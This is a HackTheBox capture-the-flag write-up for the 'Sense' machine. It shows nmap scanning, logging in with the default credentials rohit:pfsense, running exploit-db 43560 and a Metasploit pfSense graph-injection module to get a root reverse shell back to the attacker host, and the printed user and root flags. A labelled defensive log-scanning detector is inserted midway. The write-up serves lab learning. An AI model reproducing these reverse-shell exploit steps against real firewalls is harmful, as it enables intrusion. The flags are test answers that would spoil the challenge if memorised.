Sense-htb-writeup

0x00 Box skills overview

Chapter skills: default-credential search, pfSense 2.1.3 vulnerability search, CVE-2016-10709, how to use msf

Reference: hints from the official guided mode

0x01 Getting user access

1. First, get the target's IP address: 10.10.10.60

2. Scan the target with nmap, both TCP and UDP

┌──(kali㉿kali)-[~/桌面]
└─$ sudo nmap -sU 10.10.10.60
[sudo] kali 的密码:
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-03 19:56 CST
Nmap scan report for 10.10.10.60
Host is up (0.27s latency).
All 1000 scanned ports on 10.10.10.60 are in ignored states.
Not shown: 1000 open|filtered udp ports (no-response)

Nmap done: 1 IP address (1 host up) scanned in 276.71 seconds

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sV -sC 10.10.10.60 --min-rate 200 -p-
[sudo] kali 的密码:
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-03 19:56 CST
Nmap scan report for 10.10.10.60
Host is up (0.28s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http lighttpd 1.4.35
|_http-title: Did not follow redirect to https://10.10.10.60/
|_http-server-header: lighttpd/1.4.35
443/tcp open ssl/http lighttpd 1.4.35
|_http-server-header: lighttpd/1.4.35
| ssl-cert: Subject: commonName=Common Name (eg, YOUR name)/organizationName=CompanyName/stateOrProvinceName=Somewhere/countryName=US
| Not valid before: 2017-10-14T19:21:35
|_Not valid after: 2023-04-06T19:21:35
|_ssl-date: TLS randomness does not represent time
|_http-title: Login

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 663.16 seconds

3. Only 2 ports are open, so let's look at the website first.

4. It's a login form with a "sense" logo, which is usually the CMS name. Let's google for the default credentials first; if that fails, move on to directory enumeration and password brute-forcing.

5. I found two default passwords, now let's try logging in.

6. The admin login credentials are: rohit:pfsense

7. I went through every admin feature and had no ideas, so let's search exploit-db to see if there is anything exploitable. Almost forgot a step: check the system version first.

Name:pfSense.localdomain

Version:2.1.3-RELEASE (amd64)

8. The version is indeed quite old by today's standards, but let's search for vulnerabilities by version first.

┌──(kali㉿kali)-[~/桌面]
└─$ searchsploit pfSense 2.1.3
------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------- ---------------------------------
pfSense < 2.1.4 - 'status_rrd_graph_img.ph | php/webapps/43560.py
------------------------------------------- ---------------------------------
Shellcodes: No Results

9. There's one vulnerability, so let's download it.
┌──(kali㉿kali)-[~/桌面]
└─$ searchsploit -m 43560
Exploit: pfSense < 2.1.4 - 'status_rrd_graph_img.php' Command Injection
URL: https://www.exploit-db.com/exploits/43560
Path: /usr/share/exploitdb/exploits/php/webapps/43560.py
Codes: CVE-2014-4688
Verified: False
File Type: Python script, ASCII text executable
Copied to: /home/kali/桌面/43560.py
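The exploit-db entry above is an authenticated command injection in pfSense's status_rrd_graph_img.php. From the defender's side, the useful artefact is the web server's access log: every request to that script passes through lighttpd, and an injection attempt has to carry shell metacharacters in a query parameter. The following detector is an added example for this writeup, not code from the original post or from pfSense. It parses Common Log Format lines (the format lighttpd and Apache write by default), keeps only requests whose path ends in status_rrd_graph_img.php, and flags any decoded parameter value containing shell metacharacters. The log lines are constructed; the parameter names in them are assumptions, and the detector deliberately inspects every parameter rather than relying on a specific one.

```python
"""Flag likely command-injection attempts against pfSense's
status_rrd_graph_img.php in web-server access logs.

Added example for this writeup (not part of the original post or of pfSense).
Sample log lines are constructed; parameter names in them are assumptions.
"""
import re
from urllib.parse import parse_qsl, urlsplit

# Common Log Format: host ident user [time] "METHOD target proto" status size
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Characters that let a value break out of a shell command built from it.
SHELL_META_RE = re.compile(r'[;|&`$\n]|\$\(|\|\|')

# Script named in the exploit-db entry (CVE-2014-4688 / CVE-2016-10709).
VULN_SCRIPT = "status_rrd_graph_img.php"

# Constructed sample log, Common Log Format as lighttpd writes it.
SAMPLE_LOG = [
    # benign graph request of the kind the pfSense UI itself issues
    '10.0.0.5 - - [03/Dec/2023:19:56:01 +0800] '
    '"GET /status_rrd_graph_img.php?database=wan-traffic.rrd&graph=8hour HTTP/1.1" 200 5123',
    # constructed injection attempt: a ';' (URL-encoded %3B) inside a parameter value
    '10.10.14.3 - - [03/Dec/2023:20:11:42 +0800] '
    '"GET /status_rrd_graph_img.php?database=queues%3Becho%20test&graph=8hour HTTP/1.1" 200 0',
    # metacharacters, but against a different script: outside this detector's scope
    '10.0.0.5 - - [03/Dec/2023:20:12:00 +0800] "GET /index.php?q=a|b HTTP/1.1" 200 100',
    # unparseable line, must be skipped rather than crash the scan
    'not a log line',
]


def parse_line(line):
    """Parse one Common Log Format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def suspicious_params(target):
    """Return (name, value) pairs whose percent-decoded value holds shell metacharacters.

    parse_qsl already decodes %XX escapes and '+', so an encoded ';' is caught too.
    """
    query = urlsplit(target).query
    return [
        (name, value)
        for name, value in parse_qsl(query, keep_blank_values=True)
        if SHELL_META_RE.search(value)
    ]


def scan_log(lines):
    """Return one finding per request to the RRD graph script that carries shell metacharacters."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue  # skip lines that are not access-log records
        if not urlsplit(rec["target"]).path.endswith(VULN_SCRIPT):
            continue  # only the vulnerable script is in scope
        hits = suspicious_params(rec["target"])
        if hits:
            findings.append({"host": rec["host"], "time": rec["time"], "params": hits})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['time']} {f['host']} -> {f['params']}")
```

Run against the constructed sample it reports exactly one request, the one from 10.10.14.3 with `queues;echo test` in the `database` parameter; the benign graph request and the unrelated `index.php` hit are left alone. Because the script is authenticated, a finding also tells you which account was logged in at that moment, which is the next thing to pull from the pfSense system log.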

10. Let's see how this exploit is used.

11. Set up a listener first, then run the exploit.
┌──(kali㉿kali)-[~/桌面]
└─$ nc -lvnp 10086
listening on [any] 10086 ...

┌──(kali㉿kali)-[~/桌面]
└─$ python3 43560.py --rhost 10.10.10.60 --lhost 10.10.14.3 --lport 10086 --username rohit --password pfsense
CSRF token obtained
Running exploit...

12. We successfully got the reverse shell.
┌──(kali㉿kali)-[~/桌面]
└─$ nc -lvnp 10086
listening on [any] 10086 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.60] 37485
sh: can't access tty; job control turned off
# id
uid=0(root) gid=0(wheel) groups=0(wheel)

13. Something's off, how did we get root straight away? /facepalm

htb Released on 21 Oct 2017

Exploit Date: 2018-01-12

14. Something is indeed off: the box is from October 2017 and this exploit is from January 2018, so this feels a bit like hitting the box with a 0day...

15. Let me look for other vulnerabilities...

16. Continuing with Google and many different searches, I finally found a 2016 exploit.

CVE-2016-10709

exploit/unix/http/pfsense_graph_injection_exec

17. I tried it with msf and it still didn't feel right = =

18. Fine, the box is from 2017 and too old, so this doesn't apply. Let me check the official guided hints, without reading the writeup first.

19. Looks like I skipped a few steps; let me fill them in.

20. Directory/file scanning turned up a txt file containing user information, but my directory scanner didn't find it even after trying several wordlists...

21. Continuing with the guided mode

22. what are you doing???

23. Is this easy box really that easy? The 2023 easy boxes I did before all needed 2-3 pieces of information or vulnerabilities chained together to get the final root shell. This 2017 one is done with a single exploit? Are OSCP challenges this simple = =!

24. Let me add the msf procedure for CVE-2016-10709.

msf6 > search CVE-2016-10709

Matching Modules
================

# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/http/pfsense_graph_injection_exec 2016-04-18 excellent No pfSense authenticated graph status RCE


Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/http/pfsense_graph_injection_exec

msf6 > use exploit/unix/http/pfsense_graph_injection_exec
[*] Using configured payload php/meterpreter/reverse_tcp
msf6 exploit(unix/http/pfsense_graph_injection_exec) > show options

Module options (exploit/unix/http/pfsense_graph_injection_exec):

Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD pfsense yes Password to login with
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 443 yes The target port (TCP)
SSL true no Negotiate SSL/TLS for outgoing connections
USERNAME admin yes User to login with
VHOST no HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port


Exploit target:

Id Name
-- ----
0 Automatic Target



View the full module info with the info, or info -d command.

msf6 exploit(unix/http/pfsense_graph_injection_exec) > set RHOSTS 10.10.10.60
RHOSTS => 10.10.10.60
msf6 exploit(unix/http/pfsense_graph_injection_exec) > set USERNAME rohit
USERNAME => rohit
msf6 exploit(unix/http/pfsense_graph_injection_exec) > set LHOST 10.10.14.3
LHOST => 10.10.14.3
msf6 exploit(unix/http/pfsense_graph_injection_exec) > exploit

[*] Started reverse TCP handler on 10.10.14.3:4444
[*] Detected pfSense 2.1.3-RELEASE, uploading intial payload
[*] Payload uploaded successfully, executing
[*] Sending stage (39927 bytes) to 10.10.10.60
[+] Deleted JpbAUuFR
[*] Meterpreter session 1 opened (10.10.14.3:4444 -> 10.10.10.60:7882) at 2023-12-03 23:05:21 +0800

meterpreter > shell
Process 35199 created.
Channel 0 created.
id
uid=0(root) gid=0(wheel) groups=0(wheel)
pwd
/var/db/rrd
cd /home
ls
.snap
rohit
cd rohit/

ls
.tcshrc
user.txt
cat user.txt
8721327cc232073b40d27d9c17e7348b

0x02 Getting root access

25. Getting the root flag
cd /root/
ls
.cshrc
.first_time
.gitsync_merge.sample
.hushlogin
.login
.part_mount
.profile
.shrc
.tcshrc
root.txt
cat root.txt
d08c32a5d4f8c8b10e76eb51a69f1a86

exit
[-] core_channel_interact: Operation failed: 1
meterpreter >

0x03 Completion proof

https://www.hackthebox.com/achievement/machine/1705469/111


Sense-htb-writeup
https://sh1yan.top/2023/12/03/Sense-htb-writeup/
Author: shiyan
Published: 3 December 2023